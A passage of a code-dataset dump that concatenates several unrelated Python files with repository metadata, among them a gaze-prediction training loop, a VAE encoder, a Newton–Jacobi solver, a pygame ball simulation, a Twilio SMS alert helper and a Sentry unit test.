ds_diff_on.append(curr_diff)
elif roi_n in off_grp.keys():
rf_off = sca.SpatialReceptiveField.from_h5_group(off_grp[roi_n])
ell_off = rf_off.ellipse_fitting(is_plot=False)
if ell_off is not None and ell_off.get_aspect_ratio() >= ellipse_aspect_thr:
curr_diff = abs(ell_off.angle - ori)
if curr_diff > 90.:
curr_diff = 180 - curr_diff
ds_diff_off.append(curr_diff)
print('\nDirection Selective ROIs:')
print('\tWith ONOFF receptive fields:')
print('\t\tn={}'.format(len(ds_diff_onoff)))
print('\t\torie difference predicted vs. measured, mean={}'.format(np.mean(ds_diff_onoff)))
print('\t\torie difference predicted vs. measured, std={}'.format(np.std(ds_diff_onoff)))
chisq_ds_onoff, p_ds_onoff = stats.chisquare(np.histogram(ds_diff_onoff, range=[0., 90.], bins=20)[0])
print('\t\tagainst uniform distribution: chi-squared={}, p={}'.format(chisq_ds_onoff, p_ds_onoff))
print('\tWith only ON receptive fields:')
print('\t\tn={}'.format(len(ds_diff_on)))
print('\t\torie difference predicted vs. measured, mean={}'.format(np.mean(ds_diff_on)))
print('\t\torie difference predicted vs. measured, std={}'.format(np.std(ds_diff_on)))
chisq_ds_on, p_ds_on = stats.chisquare(np.histogram(ds_diff_on, range=[0., 90.], bins=20)[0])
print('\t\tagainst uniform distribution: chi-squared={}, p={}'.format(chisq_ds_on, p_ds_on))
print('\tWith only OFF receptive fields:')
print('\t\tn={}'.format(len(ds_diff_off)))
print('\t\torie difference predicted vs. measured, mean={}'.format(np.mean(ds_diff_off)))
print('\t\torie difference predicted vs. measured, std={}'.format(np.std(ds_diff_off)))
chisq_ds_off, p_ds_off = stats.chisquare(np.histogram(ds_diff_off, range=[0., 90.], bins=20)[0])
print('\t\tagainst uniform distribution: chi-squared={}, p={}'.format(chisq_ds_off, p_ds_off))
ds_diff_all = ds_diff_onoff + ds_diff_on + ds_diff_off
print('\tWith all receptive fields:')
print('\t\tn={}'.format(len(ds_diff_all)))
print('\t\torie difference predicted vs. measured, mean={}'.format(np.mean(ds_diff_all)))
print('\t\torie difference predicted vs. measured, std={}'.format(np.std(ds_diff_all)))
chisq_ds_all, p_ds_all = stats.chisquare(np.histogram(ds_diff_all, range=[0., 90.], bins=20)[0])
print('\t\tagainst uniform distribution: chi-squared={}, p={}'.format(chisq_ds_all, p_ds_all))
plt.hist([ds_diff_onoff, ds_diff_on, ds_diff_off], range=[0, 90], bins=20, stacked=True,
color=['purple', 'r', 'b'], ec='none', alpha=0.5)
plt.show()
|
[
"[email protected]"
] | |
de1e37fad3f75f1bdda9b267bc475dc95f331d6c
|
1ebdd01866600631e5db0abba10aab4c66abd4b7
|
/bench/summarize.py
|
45180f1d8cdc521bee6afedcd1a1493151e068df
|
[
"BSD-3-Clause"
] |
permissive
|
UCSD-Modern-Storage-Systems/MSS-KV-lab
|
40abf3b0b14c5145e16df2f084f52b902b9062aa
|
64f3f7bb17f45eedca24615cb9c4965e1cc4b7a2
|
refs/heads/master
| 2020-08-17T11:42:35.343853 | 2019-11-26T17:05:51 | 2019-11-26T17:05:51 | 215,661,403 | 3 | 3 | null | 2019-11-22T05:36:13 | 2019-10-16T23:18:40 |
C++
|
UTF-8
|
Python
| false | false | 1,454 |
py
|
import sys
benchmarks = [
('fillseq', '100'),
('fillseq', '1024'),
('fillrandom', '100'),
('fillrandom', '1024'),
('overwrite', '100'),
('overwrite', '1024'),
('readseq', '100'),
('readseq', '1024'),
('readrandom', '100'),
('readrandom', '1024'),
('deleteseq', '100'),
('deleteseq', '1024'),
('deleterandom', '100'),
('deleterandom', '1024'),
]
if __name__ == "__main__":
if len(sys.argv) != 2:
print "python %s output_file" % sys.argv[0]
sys.exit(1)
outfile_name = sys.argv[1]
# fillrandom : 15.140 micros/op 66048 ops/sec; 65.5 MB/s
# fillrandom : 15.140 micros/op 66051 ops/sec; 65.5 MB/s
# fillrandom : 15.100 micros/op 66225 ops/sec; 65.7 MB/s
# fillrandom : 15.047 micros/op 66460 ops/sec; 65.9 MB/s
files = []
tputs = []
for name, val_size in benchmarks:
file_name = '%s_%s.txt' % (name, val_size)
files.append(file_name)
tput = 0
try:
with open(file_name) as f:
lines = f.readlines()[-4:]
for line in lines:
words = line.strip().split()
bench_name = words[0]
assert bench_name == name
tput += int(words[4])
except:
tput = 0
tputs.append(tput)
files.insert(0, 'AverageThroughput')
print tputs
mean = int(sum(tputs) / len(tputs))
print "avg: %d ops/sec" % mean
tputs.insert(0, mean)
tputs = map(lambda x: str(x), tputs)
with open(outfile_name, 'w') as f:
f.write("%s\n" % ",".join(files))
f.write("%s\n" % ",".join(tputs))
|
[
"[email protected]"
] | |
3e8e2a961f16337985eed5135e0657e6cf615172
|
ccc688aeae19f19e2167c3e730025a1b43b7f717
|
/gazefollowing/training/train_gazenet.py
|
618fed1be3889333ff7c1655a6b9968c0a97ea7b
|
[] |
no_license
|
PrimeshShamilka/GOO
|
32cddb1c3b4ad83ec901f1e61e0defe00205991f
|
6a374cceed59cb6925099382f3f56aef52820d07
|
refs/heads/main
| 2023-09-01T05:47:59.185702 | 2021-10-13T19:07:01 | 2021-10-13T19:07:01 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 8,198 |
py
|
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
import numpy as np
import cv2
from sklearn.metrics import roc_auc_score
from tqdm import tqdm
def F_loss(direction, predict_heatmap, eye_position, gt_position, gt_heatmap):
# point loss
heatmap_loss = nn.BCELoss()(predict_heatmap, gt_heatmap)
# angle loss
gt_direction = gt_position - eye_position
middle_angle_loss = torch.mean(1 - nn.CosineSimilarity()(direction, gt_direction))
return heatmap_loss, middle_angle_loss
class GazeOptimizer():
def __init__(self, net, initial_lr):
self.optimizer_s1 = optim.Adam([{'params': net.module.face_net.parameters(),
'initial_lr': initial_lr},
{'params': net.module.face_process.parameters(),
'initial_lr': initial_lr},
{'params': net.module.eye_position_transform.parameters(),
'initial_lr': initial_lr},
{'params': net.module.fusion.parameters(),
'initial_lr': initial_lr}],
lr=initial_lr, weight_decay=0.0001)
self.optimizer_s2 = optim.Adam([{'params': net.module.fpn_net.parameters(),
'initial_lr': initial_lr}],
lr=initial_lr, weight_decay=0.0001)
self.optimizer_s3 = optim.Adam([{'params': net.parameters(), 'initial_lr': initial_lr}],
lr=initial_lr*0.1, weight_decay=0.0001)
self.lr_scheduler_s1 = optim.lr_scheduler.StepLR(self.optimizer_s1, step_size=5, gamma=0.1, last_epoch=-1)
self.lr_scheduler_s2 = optim.lr_scheduler.StepLR(self.optimizer_s2, step_size=5, gamma=0.1, last_epoch=-1)
self.lr_scheduler_s3 = optim.lr_scheduler.StepLR(self.optimizer_s3, step_size=5, gamma=0.1, last_epoch=-1)
self.optimizer = self.optimizer_s1
def getOptimizer(self, epoch):
if epoch < 7:
lr_scheduler = self.lr_scheduler_s1
self.optimizer = self.optimizer_s1
elif epoch < 15:
lr_scheduler = self.lr_scheduler_s2
self.optimizer = self.optimizer_s2
else:
lr_scheduler = self.lr_scheduler_s3
self.optimizer = self.optimizer_s3
lr_scheduler.step()
return self.optimizer
def train(net, train_dataloader, optimizer, epoch, logger):
running_loss = []
for i, data in tqdm(enumerate(train_dataloader), total=len(train_dataloader)):
image, face_image, gaze_field, eye_position, gt_position, gt_heatmap = \
data['image'], data['face_image'], data['gaze_field'], data['eye_position'], data['gt_position'], data['gt_heatmap']
image, face_image, gaze_field, eye_position, gt_position, gt_heatmap = \
map(lambda x: Variable(x.cuda()), [image, face_image, gaze_field, eye_position, gt_position, gt_heatmap])
optimizer.zero_grad()
direction, predict_heatmap = net([image, face_image, gaze_field, eye_position])
heatmap_loss, m_angle_loss = \
F_loss(direction, predict_heatmap, eye_position, gt_position, gt_heatmap)
if epoch == 0:
loss = m_angle_loss
elif epoch >= 7 and epoch <= 14:
loss = heatmap_loss
else:
loss = m_angle_loss + heatmap_loss
loss.backward()
optimizer.step()
running_loss.append([heatmap_loss.item(),
m_angle_loss.item(), loss.item()])
if i % 100 == 99:
logger.info('%s'%(str(np.mean(running_loss, axis=0))))
running_loss = []
return running_loss
def test(net, test_data_loader, logger, save_output=False):
net.eval()
total_loss = []
total_error = []
info_list = []
heatmaps = []
all_gazepoints = []
all_predmap = []
all_gtmap = []
with torch.no_grad():
for data in tqdm(test_data_loader, total=len(test_data_loader)):
image, face_image, gaze_field, eye_position, gt_position, gt_heatmap = \
data['image'], data['face_image'], data['gaze_field'], data['eye_position'], data['gt_position'], data['gt_heatmap']
image, face_image, gaze_field, eye_position, gt_position, gt_heatmap = \
map(lambda x: Variable(x.cuda()), [image, face_image, gaze_field, eye_position, gt_position, gt_heatmap])
direction, predict_heatmap = net([image, face_image, gaze_field, eye_position])
#curr_batch_size = predict_heatmap.shape[0]
#predict_heatmap = torch.rand(curr_batch_size, 1, 56, 56).cuda()
heatmap_loss, m_angle_loss = \
F_loss(direction, predict_heatmap, eye_position, gt_position, gt_heatmap)
loss = heatmap_loss + m_angle_loss
total_loss.append([heatmap_loss.item(),
m_angle_loss.item(), loss.item()])
#logger.info('loss: %.5lf, %.5lf, %.5lf'%( \
# heatmap_loss.item(), m_angle_loss.item(), loss.item()))
middle_output = direction.cpu().data.numpy()
final_output = predict_heatmap.cpu().data.numpy()
target = gt_position.cpu().data.numpy()
eye_position = eye_position.cpu().data.numpy()
predict_heatmap = predict_heatmap.cpu().data.numpy()
for m_direction, f_point, gt_point, eye_point, heatmap in \
zip(middle_output, final_output, target, eye_position, predict_heatmap):
f_point = f_point.reshape([224 // 4, 224 // 4])
heatmaps.append(f_point)
h_index, w_index = np.unravel_index(f_point.argmax(), f_point.shape)
f_point = np.array([w_index / 56., h_index / 56.])
f_error = f_point - gt_point
f_dist = np.sqrt(f_error[0] ** 2 + f_error[1] ** 2)
# angle
f_direction = f_point - eye_point
gt_direction = gt_point - eye_point
norm_m = (m_direction[0] **2 + m_direction[1] ** 2 ) ** 0.5
norm_f = (f_direction[0] **2 + f_direction[1] ** 2 ) ** 0.5
norm_gt = (gt_direction[0] **2 + gt_direction[1] ** 2 ) ** 0.5
m_cos_sim = (m_direction[0]*gt_direction[0] + m_direction[1]*gt_direction[1]) / \
(norm_gt * norm_m + 1e-6)
m_cos_sim = np.maximum(np.minimum(m_cos_sim, 1.0), -1.0)
m_angle = np.arccos(m_cos_sim) * 180 / np.pi
f_cos_sim = (f_direction[0]*gt_direction[0] + f_direction[1]*gt_direction[1]) / \
(norm_gt * norm_f + 1e-6)
f_cos_sim = np.maximum(np.minimum(f_cos_sim, 1.0), -1.0)
f_angle = np.arccos(f_cos_sim) * 180 / np.pi
#AUC
heatmap = np.squeeze(heatmap)
heatmap = cv2.resize(heatmap, (5, 5))
gt_heatmap = np.zeros((5, 5))
x, y = list(map(int, gt_point * 5))
gt_heatmap[y, x] = 1.0
all_gazepoints.append(f_point)
all_predmap.append(heatmap)
all_gtmap.append(gt_heatmap)
#score = roc_auc_score(gt_heatmap.reshape([-1]).astype(np.int32), heatmap.reshape([-1]))
total_error.append([f_dist, f_angle])
info_list.append(list(f_point))
info_list = np.array(info_list)
l2, ang = np.mean(np.array(total_error), axis=0)
all_gazepoints = np.vstack(all_gazepoints)
all_predmap = np.stack(all_predmap).reshape([-1])
all_gtmap = np.stack(all_gtmap).reshape([-1])
auc = roc_auc_score(all_gtmap, all_predmap)
if save_output:
np.savez('predictions.npz', gazepoints=all_gazepoints)
#logger.info('average loss : %s'%str(np.mean(np.array(total_loss), axis=0)))
logger.info('average error: %s'%str([auc, l2, ang]))
net.train()
return [auc, l2, ang]
|
[
"[email protected]"
] | |
8577baebc54712a01aff72b610290ff2ca7776d9
|
cd8d6d20351b86b6e2b28500467d8999f9fa4439
|
/src/image_scraping_step_3/alert_program.py
|
83a08327cd98f3738516d57a4b84849217aa1d3c
|
[
"MIT"
] |
permissive
|
mhmulder/image_captioning
|
bf706f574ba12e3daa5b9b8bfdf0d733233abb7d
|
ed22a3b4948d1ce5e8db580433d58945a2a5f010
|
refs/heads/master
| 2021-09-05T19:46:12.694992 | 2018-01-30T16:46:29 | 2018-01-30T16:46:29 | 115,772,652 | 1 | 1 | null | 2018-01-30T16:46:30 | 2017-12-30T04:07:16 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 794 |
py
|
from twilio.rest import Client
import os
accountSID = os.environ["TWILIO_SID"]
authToken = os.environ["TWILIO_TOKEN"]
myTwilioNumber = os.environ["TWILIO_NUMBER"]
myCellPhone = os.environ["my_number"]
def send_end_alert(project_name, body='Default', accountSID=accountSID,
authToken=authToken, myTeilioNumber=myTwilioNumber,
myCellPhone=myCellPhone):
if body != 'Default': body = body
else: body = 'Your project, {}, has completed!'.format(project_name)
twilioCli = Client(accountSID, authToken)
message = twilioCli.messages.create(body=body,
from_=myTwilioNumber,
to=myCellPhone)
return message
if __name__ == '__main__':
send_end_alert('test')
|
[
"[email protected]"
] | |
9579a5ea7fad7a79327c9acb00f549bdbc62ea29
|
6b9ee9e92d0c0075b7098f43c7b0cd3cd49b4f63
|
/ball.py
|
ab81587f8faf0ae9f6f2ccec3ddecc81faaef82e
|
[] |
no_license
|
dohyunmoo/Bouncing-Balls
|
429c5f9c6adf3afbb958ce858f962f221c8c9f35
|
5dc081a7a6b54bf18d360a984f9c30f9141d2829
|
refs/heads/main
| 2023-02-17T21:52:48.607727 | 2021-01-08T13:18:42 | 2021-01-08T13:18:42 | 327,908,171 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,177 |
py
|
import pygame
import random
pygame.init()
class Ball:
def __init__(self, radius, color, startingx, startingy, friction, weight):
self.radius = radius
self.diameter = radius*2
self.color = color
self.x = startingx
self.y = startingy
self.vx = friction
self.vy = weight
self.yspeed = 0
self.xspeed = 0
def draw(self, win, width, height):
minimumx = self.radius
maximumx = width - self.radius
minimumy = self.radius
maximumy = height - self.radius
if self.xspeed >= 0 and self.xspeed != 0:
self.xspeed -= self.vx
elif self.xspeed < 0 and self.xspeed != 0:
self.xspeed += self.vx
self.x += self.xspeed
self.yspeed += self.vy
self.y += self.yspeed
self.collision(width, height, minimumx, maximumx, minimumy, maximumy)
if self.x >= maximumx:
self.x = maximumx
if self.y >= maximumy:
self.y = maximumy
pygame.draw.circle(win, self.color, (self.x, self.y), self.radius)
def collision(self, width, height, xmin, xmax, ymin, ymax):
if self.x <= xmin or self.x >= xmax:
self.xspeed *= -1
if self.xspeed >= 0 and self.xspeed != 0:
self.xspeed -= self.vx
elif self.xspeed < 0 and self.xspeed != 0:
self.xspeed += self.vx
self.x += self.xspeed
elif self.y >= ymax:
self.yspeed *= -1
self.yspeed += self.vy
self.y += self.yspeed
def addForce(self, pos):
if (pos[0] <= self.x + self.radius and pos[0] >= self.x - self.radius) and (pos[1] <= self.y + self.radius and pos[1] >= self.y - self.radius):
if self.xspeed <= 0:
self.xspeed -= random.randint(5,10)
else:
self.xspeed += random.randint(5,10)
if self.yspeed <= 0:
self.yspeed -= random.randint(10,20)
else:
self.yspeed += random.randint(10,20)
|
[
"[email protected]"
] | |
23880f4bb3b0fbc30871786ed1a37bc44186075e
|
19651a8d1eabe37f74dc7562c2bf3b5dcb990b32
|
/newton-jakobi.py
|
70c4afc5f7fadfbe2a2583978042a64cfb2769b3
|
[] |
no_license
|
damoklov/numeric-methods
|
b9f7571244da8da65b6fed31747c45eaefa7973d
|
3b9cde027ed1330862487f8b9eb72ddc66a95b25
|
refs/heads/master
| 2023-02-11T19:15:29.305119 | 2020-12-28T12:22:25 | 2020-12-28T12:22:25 | 311,182,365 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,754 |
py
|
def f1(x1, x2):
return x2**2 - x1**2 - 0.1 - x1
def f2(x1, x2):
return 0.1 - 2*x1*x2 - x2
def newton_jakobi():
eps = 0.001
argument_vector = [0.5, 0.5]
prev_vector = [0, 0]
identity_matrix = initialize_matrix()
f = [0, 0]
while True:
f[0] = f1(argument_vector[0], argument_vector[1])
f[1] = f2(argument_vector[0], argument_vector[1])
jacobian = build_jacobian(argument_vector, f)
reversed_jacobian = reverse_matrix(jacobian, identity_matrix)
for i in range(len(f)):
x_old = argument_vector[i]
prev_vector[i] = x_old
increment = 0.0
for j in range(2):
increment += reversed_jacobian[i][j] * f[i]
argument_vector[i] = prev_vector[i] - increment
if abs((argument_vector[0] - prev_vector[0])/argument_vector[0]) < eps:
break
elif abs((argument_vector[1] - prev_vector[1])/argument_vector[1]) < eps:
break
print(argument_vector)
print(f1(argument_vector[0], argument_vector[1]))
print(f2(argument_vector[0], argument_vector[1]))
def build_jacobian(argument_vector, function_vector):
h = 1
args = [0, 0]
f = [0, 0]
jacobian = [[0, 0], [0, 0]]
for i in range(2):
for j in range(2):
for k in range(2):
args[k] = argument_vector[k]
args[j] = argument_vector[j] + h
f[0] = f1(args[0], args[1])
f[1] = f2(args[0], args[1])
jacobian[i][j] = (f[i] - function_vector[i])/h
return jacobian
def initialize_matrix():
matrix = [[0 for _ in range(4)] for _ in range(4)]
for i in range(len(matrix)):
for j in range(len(matrix[i])):
if i == j:
matrix[i][j] = 1
else:
matrix[i][j] = 0
return matrix
def reverse_matrix(matrix, identity_matrix):
size = len(matrix)
reversed_matrix = [[0 for _ in range(size)] for _ in range(size)]
for i in range(size):
solution = roots(i, matrix, identity_matrix)
for j in range(len(solution)):
reversed_matrix[j][i] = solution[j]
return reversed_matrix
def roots(counter, matrix, identity_matrix):
size = len(matrix)
coefficients = [[0 for _ in range(size)] for _ in range(size)]
free_members = [0 for _ in range(size)]
argument_positions = [0 for _ in range(size)]
result_coefficients = [[0 for _ in range(size)] for _ in range(size)]
result_free_members = [0 for _ in range(size)]
free_members, coefficients, argument_positions = initialize_system(
free_members, identity_matrix, counter, argument_positions, coefficients, matrix)
result_free_members, free_members, coefficients, result_coefficients = direct_way(
result_free_members, free_members, coefficients, result_coefficients, argument_positions, size)
result = reverse_way(result_free_members, result_coefficients)
result, argument_positions = order_vector(result, argument_positions)
return result
def order_vector(result, argument_positions):
for i in range(len(result)):
if argument_positions != i:
arg = argument_positions[i]
value = result[i]
result[i] = result[arg]
result[arg] = value
argument_positions[i] = argument_positions[arg]
argument_positions[arg] = arg
return result, argument_positions
def direct_way(result_free_members, free_members, coefficients, result_coefficients, argument_positions, size):
for i in range(size):
coefficients, free_members, argument_positions, result_coefficients = optimize_matrix(
i, coefficients, free_members, argument_positions, result_coefficients, size)
result_free_members[i] = free_members[i] / coefficients[i][i]
for j in range(i + 1, size):
free_members[j] = free_members[j] - coefficients[j][i] * result_free_members[i]
for k in range(i + 1, size):
result_coefficients[i][k] = coefficients[i][k] / coefficients[i][i]
coefficients[j][k] = coefficients[j][k] - coefficients[j][i] * result_coefficients[i][k]
return result_free_members, free_members, coefficients, result_coefficients
def reverse_way(result_free_members, result_coefficients):
size = len(result_free_members)
solution = [0 for _ in range(size)]
for i in range(size -1, -1, -1):
sum = 0.0
for j in range(i + 1, size):
sum += result_coefficients[i][j] * solution[j]
solution[i] = result_free_members[i] - sum
return solution
def initialize_system(free_members, identity_matrix, counter, argument_positions, coefficients, matrix):
size = len(matrix)
for i in range(size):
free_members[i] = identity_matrix[i][counter]
argument_positions[i] = i
for j in range(size):
coefficients[i][j] = matrix[i][j]
return free_members, coefficients, argument_positions
def optimize_matrix(r, coefficients, free_members, argument_positions, result_coefficients, size):
max_coefficient = coefficients[r][r]
max_row = r
max_col = r
for i in range(size):
for j in range(size):
if max_coefficient < abs(coefficients[i][j]):
max_coefficient = abs(coefficients[i][j])
max_row = i
max_col = j
free_members = swap_array_values(free_members, r, max_row)
for l in range(size):
coefficients = swap_matrix_values_row(coefficients, r, max_row, l)
argument_positions = swap_argument_positions(argument_positions, r, max_col)
for m in range(size):
if m < r:
result_coefficients = swap_matrix_values_columns(result_coefficients, m, r, max_col)
else:
coefficients = swap_matrix_values_columns(coefficients, m, r, max_col)
return coefficients, free_members, argument_positions, result_coefficients
def swap_matrix_values_columns(matrix, r, fc, sc):
temp = matrix[r][fc]
matrix[r][fc] = matrix[r][sc]
matrix[r][sc] = temp
return matrix
def swap_argument_positions(argument_positions, r, max_col):
temp = argument_positions[r]
argument_positions[r] = argument_positions[max_col]
argument_positions[max_col] = temp
return argument_positions
def swap_array_values(free_members, fc, sc):
temp = free_members[fc]
free_members[fc] = free_members[sc]
free_members[sc] = temp
return free_members
def swap_matrix_values_row(matrix, fc, sc, col):
temp = matrix[fc][col]
matrix[fc][col] = matrix[sc][col]
matrix[sc][col] = temp
return matrix
if __name__ == '__main__':
newton_jakobi()
|
[
"[email protected]"
] | |
2abb9c8ae38feb38f85cf81f93563ee9f1f3914a
|
5cc9623db04e92a9ddee09c27a168d04c39b6e19
|
/model/encoder.py
|
beb00c3109d7b79d9fd4e96c2b9b261a3958fa8f
|
[
"MIT"
] |
permissive
|
FengHZ/VAEGAN
|
2e4d8c65d39e0b79a983b1be45c29987ecfc3f3e
|
0c113dc973b19fe212aca07a4a898fa919346d41
|
refs/heads/master
| 2020-05-22T04:52:42.156153 | 2019-05-12T07:30:09 | 2019-05-12T07:30:09 | 186,224,301 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,451 |
py
|
from torch import nn
import torch
class Encoder(nn.Module):
def __init__(self, num_channel=3, num_feature=64, latent_dim=100, data_parallel=True):
super(Encoder, self).__init__()
features = nn.Sequential(
# input is (num_channel) x 64 x 64
nn.Conv2d(num_channel, num_feature, 4, 2, 1, bias=False),
nn.LeakyReLU(0.2, inplace=True),
# state size. (num_feature) x 32 x 32
nn.Conv2d(num_feature, num_feature * 2, 4, 2, 1, bias=False),
nn.BatchNorm2d(num_feature * 2),
nn.LeakyReLU(0.2, inplace=True),
# state size. (num_feature*2) x 16 x 16
nn.Conv2d(num_feature * 2, num_feature * 4, 4, 2, 1, bias=False),
nn.BatchNorm2d(num_feature * 4),
nn.LeakyReLU(0.2, inplace=True),
# state size. (num_feature*4) x 8 x 8
nn.Conv2d(num_feature * 4, num_feature * 8, 4, 2, 1, bias=False),
nn.BatchNorm2d(num_feature * 8),
nn.LeakyReLU(0.2, inplace=True),
)
z_mean_map = nn.Sequential(
# state size. (num_feature*8) x 4 x 4
nn.Conv2d(num_feature * 8, latent_dim, 4, 1, 0, bias=True),
)
z_log_sigma_map = nn.Sequential(
# state size. (num_feature*8) x 4 x 4
nn.Conv2d(num_feature * 8, latent_dim, 4, 1, 0, bias=True),
)
if data_parallel:
self.features = nn.DataParallel(features)
self.z_mean_map = nn.DataParallel(z_mean_map)
self.z_log_sigma_map = nn.DataParallel(z_log_sigma_map)
else:
self.features = features
self.z_mean_map = z_mean_map
self.z_log_sigma_map = z_log_sigma_map
for name, param in self.named_parameters():
if 'conv' in name and 'weight' in name:
nn.init.xavier_normal_(param.data)
elif 'norm' in name and 'weight' in name:
param.data.fill_(1)
elif 'norm' in name and 'bias' in name:
param.data.fill_(0)
def forward(self, input):
features = self.features(input)
mu = self.z_mean_map(features)
log_sigma = self.z_mean_map(features)
sigma = torch.exp(log_sigma)
std_z = torch.randn(mu.size())
if mu.is_cuda:
std_z = std_z.cuda()
z_sample = mu+std_z*sigma
return features, mu, log_sigma, sigma,z_sample
|
[
"[email protected]"
] | |
7baa26a26fc7ed616e1f4cfa37d283d39e72ebf3
|
bbdd7f44884844cd0f7332d63945852dc2b53083
|
/mypy_drf_plugin/transformers/fields.py
|
f4f8a10b2f9cc833f0b0e6cedc3fe13340f2fdf9
|
[
"MIT"
] |
permissive
|
private-forks/djangorestframework-stubs
|
e258e1dfc2af80fdf93322338ea3ce5452087e2d
|
18427718c913f3d23ef7a4636c8205df42999cf2
|
refs/heads/master
| 2020-04-25T09:11:04.067894 | 2019-02-24T22:25:03 | 2019-02-24T22:25:03 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,241 |
py
|
from mypy.nodes import TypeInfo, Var
from mypy.plugin import FunctionContext
from mypy.types import AnyType, Instance, Type, TypeOfAny
from mypy_django_plugin import helpers
def get_private_descriptor_type(type_info: TypeInfo, private_field_name: str, is_nullable: bool) -> Type:
if not type_info.has_readable_member(private_field_name):
return AnyType(TypeOfAny.unannotated)
node = type_info.get(private_field_name).node
if isinstance(node, Var):
descriptor_type = node.type
if is_nullable:
descriptor_type = helpers.make_optional(descriptor_type)
return descriptor_type
return AnyType(TypeOfAny.unannotated)
def fill_parameters_of_descriptor_methods_from_private_attributes(ctx: FunctionContext) -> Type:
default_return_type = ctx.default_return_type
if not isinstance(default_return_type, Instance):
return default_return_type
is_nullable = bool(helpers.parse_bool(helpers.get_argument_by_name(ctx, 'allow_null')))
get_type = get_private_descriptor_type(default_return_type.type, '_pyi_private_get_type',
is_nullable=is_nullable)
return helpers.reparametrize_instance(default_return_type, [get_type])
|
[
"[email protected]"
] | |
d09ebfb916301f9570de15677478373cadbd685a
|
9db18bcc847ffdff8ca1aa8fe2470bdd1d17f609
|
/LAB1/generate_similar_event.py
|
32b83c22ea6385ae25638088ea0d280d905273fa
|
[] |
no_license
|
ShangGaoG/CVLAB
|
4397c125ec412329aa45af705465aae73b2f1d16
|
b9f1c24ba35a7af56f556a63796798bd4e8cc234
|
refs/heads/master
| 2023-03-25T15:48:07.566625 | 2020-12-09T00:49:54 | 2020-12-09T00:49:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,482 |
py
|
from utils.misc import *
import pandas as pd
from sklearn.metrics.pairwise import cosine_similarity
from matplotlib import pyplot as plt
import sys
import numpy as np
def generate_similar_events(query_path,gallery_path):
df = pd.read_json(gallery_path)
gallery_id = df['gallery_id']
gallery_vector = df['gallery_incident']
df_query_incident = pd.read_json(query_path)
query_id = df_query_incident['query_id']
query_vector = df_query_incident['query_incident']
gallery_vector = np.array(list(gallery_vector), dtype=float)
gallery_id = np.array(list(gallery_id))
query_vector = np.array(list(query_vector), dtype=float)
query_id = list(query_id)
length = len(query_id)
similar_events = []
for i in range(length):
id = query_id[i]
vector = query_vector[i]
similarity = cosine_similarity([vector], gallery_vector)
similarity = similarity.flatten()
arg_index = np.argsort(similarity)
arg_index = arg_index[::-1]
similarity_incident = gallery_id[list(arg_index[0:5])]
similar_events.append(similarity_incident)
df_new = pd.DataFrame({'query event':query_id,'similar events':similar_events})
df_new.to_csv('similar_event.csv')
df_new.to_json('similar_event.json')
query_path = '/home/xiaoxiaoyu/codes/imgs_cls/query_incident.json'
gallery_path = '/home/xiaoxiaoyu/codes/imgs_cls/gallery_incident.json'
generate_similar_events(query_path,gallery_path)
|
[
"[email protected]"
] | |
12b66e27cea728950994f9107bed6a3ac88c37e0
|
977fcb9a15da52340dab332f7668dde57317f9f3
|
/tests/sentry/mediators/sentry_app_installations/test_creator.py
|
501aa0dfe71cb01db55eb1eb8186413f1a00b25c
|
[
"BSD-2-Clause"
] |
permissive
|
conan25216/sentry
|
8649761d4cbd2ff7ec21b1ac171f0997da2e692f
|
fe38ab19fb096688140b2065da0e45fa26762200
|
refs/heads/master
| 2020-04-09T12:37:20.846884 | 2018-12-04T12:20:26 | 2018-12-04T12:20:26 | 160,357,556 | 1 | 0 |
BSD-3-Clause
| 2018-12-04T12:56:51 | 2018-12-04T12:56:50 | null |
UTF-8
|
Python
| false | false | 1,566 |
py
|
from __future__ import absolute_import
from mock import patch
from sentry.mediators.sentry_app_installations import Creator
from sentry.models import ApiAuthorization
from sentry.testutils import TestCase
class TestCreator(TestCase):
def setUp(self):
self.user = self.create_user()
self.org = self.create_organization()
self.sentry_app = self.create_sentry_app(
name='nulldb',
organization=self.org,
scopes=('project:read',),
)
self.creator = Creator(
organization=self.org,
slug='nulldb',
user=self.user,
)
def test_creates_api_authorization(self):
install, grant = self.creator.call()
assert ApiAuthorization.objects.get(
application=self.sentry_app.application,
user=self.sentry_app.proxy_user,
scopes=self.sentry_app.scopes,
)
def test_creates_installation(self):
install, grant = self.creator.call()
assert install.pk
def test_creates_api_grant(self):
install, grant = self.creator.call()
assert grant.pk
@patch('sentry.tasks.app_platform.installation_webhook.delay')
def test_notifies_service(self, installation_webhook):
install, _ = self.creator.call()
installation_webhook.assert_called_once_with(install.id, self.user.id)
def test_associations(self):
install, grant = self.creator.call()
assert install.api_grant == grant
assert install.authorization is not None
|
[
"[email protected]"
] | |
137acc6d4721ec38018a668237bf95435195db61
|
6f2a072148725d98d2bc96235fde4e0d83aa9bbd
|
/lib/assets/scoring.py
|
ce268a59ff200a95cdabcb147bf66a9dc28f670e
|
[] |
no_license
|
jjh5166/prempicks
|
1fbf86fb4fe2eec952245f7ed9d4c9441a03257c
|
24b8951b57049a2d3872b917e7ad1e79156f2f53
|
refs/heads/master
| 2023-01-22T02:59:15.803754 | 2021-01-11T21:01:14 | 2021-01-11T21:01:14 | 144,220,632 | 0 | 0 | null | 2023-01-19T14:06:00 | 2018-08-10T01:20:46 |
Ruby
|
UTF-8
|
Python
| false | false | 3,060 |
py
|
import http.client, sys, os, json, boto3
from os.path import join, dirname
from dotenv import load_dotenv
dotenv_path = join(dirname(__name__), '.env')
load_dotenv(dotenv_path)
APIkey = str(os.getenv('FOOTBALL_API_KEY'))
AwsAccessKeyID = str(os.getenv('AWS_ACCESS_KEY_ID'))
AwsSecretAccessKey = str(os.getenv('AWS_SECRET_ACCESS_KEY'))
AwsRegion = str(os.getenv('AWS_REGION'))
AwsBucket = str(os.getenv('S3_BUCKET'))
matchday = str(sys.argv[1])
request_string = f'/v2/competitions/PL/matches/?matchday={matchday}'
connection = http.client.HTTPConnection('api.football-data.org')
headers = {'X-Auth-Token': APIkey}
connection.request('GET', request_string, None, headers)
response = json.loads(connection.getresponse().read().decode())
s3 = boto3.resource(
's3',
region_name=AwsRegion,
aws_access_key_id=AwsAccessKeyID,
